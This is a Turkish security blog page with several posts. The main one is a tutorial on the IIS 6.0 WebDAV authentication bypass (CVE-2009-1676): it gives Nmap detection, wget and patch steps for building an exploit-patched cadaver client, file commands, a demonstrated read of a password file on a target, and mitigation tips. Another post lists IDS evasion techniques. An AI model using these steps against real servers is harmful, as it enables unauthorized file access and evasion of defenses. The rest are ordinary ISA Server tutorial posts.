Microsoft IIS 6.0 WebDAV Açığı, Tespiti, Exploit Edilmesi ve Korunma Yolları

22 May 2009

CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.

Web sunucuda bulunan klasorlere ve dosyalara erişim için Windows Authentication gerektiren kimlik doğrulama unicode kullanılarak bypass edilebiliniyor.
Yetki dahilinde dosya okumak, dizin listelemek ve uzak sunucuya dosya yazmak (içerik eklemek) mümkün.

Bu makalede bu işlemin nasıl yapıldığı ve korunma yollarına değinilmiştir.

Aktif Webdav Servisinin Tespiti

IIS 5.0 da Webdav servisi varsayılan olarak açık gelir.IIS 6.0 sunucularda ise webdav servisi varsayılan olarak aktif değildir.

IIS sunucuda Webdav servisinin aktif olduğunu Nmap NSE sciprti ve Enumaration araçları ile tespit edebiliriz.

Nmap NSE scriptine http://ack-rst.com/scripts/webdav.nse adresinden ulaşabilirsiniz.

Nmap ile ozan.net adresindeki IIS 6 sunucunun Webdav servisinin aktif olduğunu öğrendik.

Exploit (Suistimal)

Bu zaafiyeti kullanarak hedef sistemde yapılacak işlemler hakkında aşağıdaki videoyu izleyebilirsiniz.

http://www.cehturkiye.com/iis6webdav/iis6webdav.html

Bilgisayarınıza indirmek için ;
http://www.4shared.com/file/107065019/de6006aa/iis6webdavvulnerabilty.html

Skullsecurity.org  tarafından açığı sömüren otomize edilmiş bir betik yayımlandı.

Kurulumu ve kullanımı aşağıdaki gibidir ;
1-mkdir webdav
2-cd webdav
3-wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
——
4-wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
——
5-tar xzvf cadaver-0.23.2.tar.gz
——
6- cd cadaver-0.23.2/
7- patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
7-./configure
——
8- make
——

Yukarıdaki adımlardan sonra “cadaver” aracı kurulmuş olucak.

./cadaver xx.xx.xx.xx şeklinde kullanabilirsiniz.

Artık dav:/> satırına düştükden sonra savunmasız dizine geçebilir.Neler olduğunu görüntüleyerek yetki dahilinde istediğiniz işlemi yapabilirsiniz.

Yapılacak işlemler için aşağıdaki komutlar kullanılır ;
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE

ozan.net hedefi exploit edilerek, “gizli” klasorundeki “parola.txt” içeriği okunmuştur.

Bu zaafiyetten korunmak için;
- Webdav servisi kullanılmıyorsa kapatın.
-Webdav ile paylaşılan klasorlerin/dosyaların yetkilerini düzenleyin
-Microsoft’un yama çıkarmasını bekleyin :(
-Eğer bir IDS/IPS sisteminiz var imza veritabanını güncelleyin.

Etiketler: , , ,
Kategori Görsel Anlatımlar, Güvenlik | Yorum Yok »

ISA SERVER - Kaçak Giriş Tespit ve Engelle Sistemi (IDS/IPS)

28 April 2009

Isa server 2006, kaçak giriş tespit ve saldırı engelleme sistemleri arasında bulunan bir Microsoft çözümüdür.

Isa Server 2006 Firewall,İçerik Filtreleme ve Cache özelliği yanı sıra  kaçak giriş tespit ve saldırı engelleme  özelliği de bulunmakta.Bu özelliği ile bulunduğu networkü saldırılara karşı korumaktadır.

IDS, Firwall ve Honeypotlar” başlıklı makalemde Kaçak Giriş Tespit ve Saldırı Engelleme Sistemleri (Intrusion Detection and Intrusion Prevention Systems) hakkında detaylı bilgi bulabilirsiniz.

ISA Server 2006 nın bu özelliğini, port scanning, ip spoof ve syn flood saldırıları yaparak kücük bir test yaptım.
Üzülerek söylemeliyim ki, her IDS/IPS sistemi gibi ISA Server’da saldırıları tespit etmede ve engellemede pek başarılı sayılmaz.
ID sistemleri atlatmanın bariz yolları günümüzde kısmen gerçeli olmakta, saldırılar maskelenerek sistemler atlatılabilmektedir ;
-Birçok nasit IDS imza tespiti ile çalışır.
-Saldırı scriptlerinin imzaları veritabanında kayıtlıdır bunun la saldırıyı karşılaştırır, script
üzerinde ufak değişiklik IDS ten geçmesine sebep olur.
-IDS leri geçme imza benzeşmesini uyumsuz hale getirmekle olur.
-Örnek olarak bazı pop3 serverlar uzun şifre girmek gibi bufer overflow saldırılarına karşı zayıftırlar , Script üzerinde basit değişiklikle bu saldırı maskelenebilir.Parçalanmış paketlerle IDS atlatılabilir.

Diğer saldırı, kaçak giriş denemeleri ve ISA Server’ı atlatmanın yollarını FORUM sayfamızda paylaşıp tartışıcaz.
Videoyu bilgisayarınıza indirmek için ;
http://www.4shared.com/file/102238546/1019f494/ISAServer2006-IDSIPS.html

Tam ekran izlemek için ;
http://www.cehturkiye.com/IsaServer2006/ISAServer2006-IDSIPS/ISAServer2006-IDSIPS.html

Saygılarımla…

Etiketler: , , ,
Kategori Firewall, Görsel Anlatımlar, Güvenlik, Püf Noktalar | Yorum Yok »

ISA SERVER 2006 - VPN

26 April 2009

VPN, Virtual Private Network’ün (Sanal Özel Ağ) kısaltması olup, ağlara güvenli bir şekilde uzaktan erişimde kullanılan bir teknolojidir. Sanal bir ağ uzantısı yarattığından uzaktan bağlanan makine konuk gibi değil, ağa fiziksel olarak bağlıymış gibi görünür.

Firmalar tarafından yaygın olarak kullanılan VPN, yöneticilerin, uzak ofislerin, bayi, acenta, satış temsilcilerinin güvenli bir şekilde özel ağlara bağlanmalarını sağlar.

Bu makalede, Isa Server 2006 ile VPN Client bağlantı konfigürasyonunu içeren eğitim videosu yer alıyor.

Videoyu tam ekran izlemek için :
http://www.cehturkiye.com/IsaServer2006/ISAServer2006-Vpn/

Videyu bilgisayarınıza indirmek için :
http://www.4shared.com/file/101711478/bba377a3/ISAServer2006-Vpn.html

Etiketler: , , , , ,
Kategori Firewall, Görsel Anlatımlar, Güvenlik | Yorum Yok »

ISA SERVER 2006 ENTERPRISE KURULUMU

19 April 2009

ISA Server 2006,  Microsoft güvenlik çözümleri arasında yaygın kullanılan yazılımsal bir firewall uygulamasıdır.
Sistem ve Network ü iç ve dış tehditlere karşı korurken aynı zamanda kullanıcıların uygulama ve verilere hızlı, güvenli bir şekilde erişmelerine olanak sağlayan entegre uç güvenliği ağ geçididir.

ISA Server 2006’nın iki sürümü bulunur: Standard sürüm ve Enterprise sürüm.İki sürüm arasındaki farklılıkları buraya tıklayarak öğrenebilirsiniz.

Kullanım Senaryoları ;
ISA Server 2006, ağ operasyonlarının güvenliği, performansı, yönetilebilirliği ve düşük maliyeti hakkında endişe duyan BT yöneticileri, ağ yöneticileri ve bilgi güvenliği uzmanlarına değer sağlar. ISA Server 2006, aşağıdakileri gerçekleştirmeniz için size yardım eder:
Uzaktan Erişim için İçeriği Güvenli bir Şekilde Yayımlama. ISA Server 2006, Internet üzerinden erişilen şirket uygulamaları için güvenliği sağlamak üzere uygulamayı düzenler.
Şubeleri Birbirine Bağlama ve Güvene Alma. ISA Server 2006, mevcut ağ bağlantılarını güçlendirip ağ maliyetlerini düşürerek şirket ağlarını güvenli bir şekilde genişletmek için sağlam bir yol sunar.
Dahili ve Harici Web Tabanlı Tehditlere Karşı Savunma. ISA Server 2006, ağlarınızı yönetmek ve korumak için daha güçlü bir güvenlik sunmak üzere üretilmiştir.

Bu makalede ISA Server 2006 Enterprise kurulumu, temel ayarlamalar  ve kural yazma aşamalarının eğitim videosu yer alıyor.

Videoyu izlemek için ;
http://www.cehturkiye.com/IsaServer2006/IsaServer2006.html

Videoyu bilgisayarınıza indirmek için ;
http://www.4shared.com/file/100226931/8206413e/IsaServer2006.html

Not: Video mp4 formatında hazırlanmıştır.İzlemeniz için quick time vb. yazılım olmalı.

Etiketler: , , , , , , , , , , , ,
Kategori Firewall, Görsel Anlatımlar, Güvenlik, Windows Server | Yorum Yok »

« Eski Yazılar